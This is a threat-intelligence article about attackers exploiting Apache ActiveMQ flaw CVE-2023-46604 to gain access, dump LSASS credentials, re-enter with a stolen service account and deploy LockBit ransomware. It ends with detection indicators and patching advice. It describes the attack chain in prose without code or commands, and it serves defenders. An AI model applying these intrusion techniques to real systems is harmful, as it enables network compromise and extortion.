Critical Apache ActiveMQ Vulnerability Exploited to Deploy LockBit Ransomware
A severe security flaw in Apache ActiveMQ, identified as CVE-2023-46604, has been actively exploited by cybercriminals to infiltrate enterprise networks and deploy LockBit ransomware. This vulnerability, rated with a CVSS score of 10.0, allows unauthenticated attackers to execute arbitrary shell commands by manipulating serialized class types in the OpenWire protocol, leading to remote code execution (RCE).
Initial Exploitation and Attack Progression
The attack commenced in mid-February 2024 when threat actors targeted a publicly accessible Apache ActiveMQ server. By sending a specially crafted OpenWire command, they exploited the CVE-2023-46604 vulnerability, causing the server to load a remote Java Spring XML configuration file. This file instructed the compromised host to download a Metasploit stager using the Windows CertUtil utility. Once executed, the stager established a command-and-control (C2) channel to an attacker-controlled server at IP address 166.62.100[.]52.
Within 40 minutes of initial access, the attackers escalated their privileges to SYSTEM level and began extracting credentials from the Local Security Authority Subsystem Service (LSASS) process memory on the compromised host. This rapid escalation underscores the critical nature of the vulnerability and the efficiency of the attackers’ methods.
Persistence and Re-Exploitation
Despite initial detection and eviction of the attackers on the second day of the intrusion, the vulnerable ActiveMQ server remained unpatched. Eighteen days later, the threat actors re-exploited the same CVE-2023-46604 vulnerability, altering only the names of the files downloaded post-exploitation. Their re-entry was facilitated by credentials stolen during the first intrusion, specifically from a privileged service account, providing them with direct access to the network.
Lateral Movement and Ransomware Deployment
Upon re-entry, the attackers confirmed their domain administrator access and utilized a disguised network scanning tool to identify active hosts within the environment. They then moved LockBit ransomware executables to servers and workstations via Remote Desktop Protocol (RDP) sessions, deploying files named LB3.exe and LB3_pass.exe. On file and backup servers, the ransomware was executed with specific path and password arguments, while on other hosts, it was initiated through direct execution in the Windows Explorer interface.
The ransom notes left behind directed victims to the Session private messaging app, rather than official LockBit infrastructure, suggesting that the attackers may have used the leaked LockBit Black builder to create their ransomware. The total time from initial exploitation to full encryption was approximately 19 days, highlighting the attackers’ patience and strategic planning.
Credential Theft and Lateral Movement Techniques
After achieving SYSTEM-level access on the initial compromised host, the attackers accessed LSASS process memory on four separate hosts during the first intrusion phase. System Monitor (Sysmon) logs captured the GrantedAccess value of 0x1010, indicating read access to virtual memory, alongside a CallTrace UNKNOWN entry—a reliable indicator of injected code performing the dump without leaving a standard process trail.
One of the targeted hosts was running a production application tied to a privileged service account. The credentials from this account became the bridge the threat actors used to re-enter the network during the second phase of the attack. This method of credential theft and reuse underscores the importance of securing privileged accounts and monitoring for unauthorized access.
Mitigation and Recommendations
To protect against such exploits, organizations should take the following steps:
1. Patch Management: Immediately apply the security updates provided by Apache to address CVE-2023-46604. Upgrading to versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 mitigates this vulnerability.
2. Network Security: Restrict access to ActiveMQ servers by implementing firewall rules that limit exposure to trusted networks and users.
3. Monitoring and Detection: Deploy intrusion detection and prevention systems to monitor for unusual activity, such as unauthorized access attempts or unexpected network traffic patterns.
4. Credential Security: Regularly audit and rotate credentials, especially for privileged accounts, to minimize the risk of credential theft and reuse.
5. Incident Response Planning: Develop and regularly update incident response plans to ensure swift action can be taken in the event of a security breach.
By proactively addressing these areas, organizations can significantly reduce the risk of exploitation and enhance their overall cybersecurity posture.
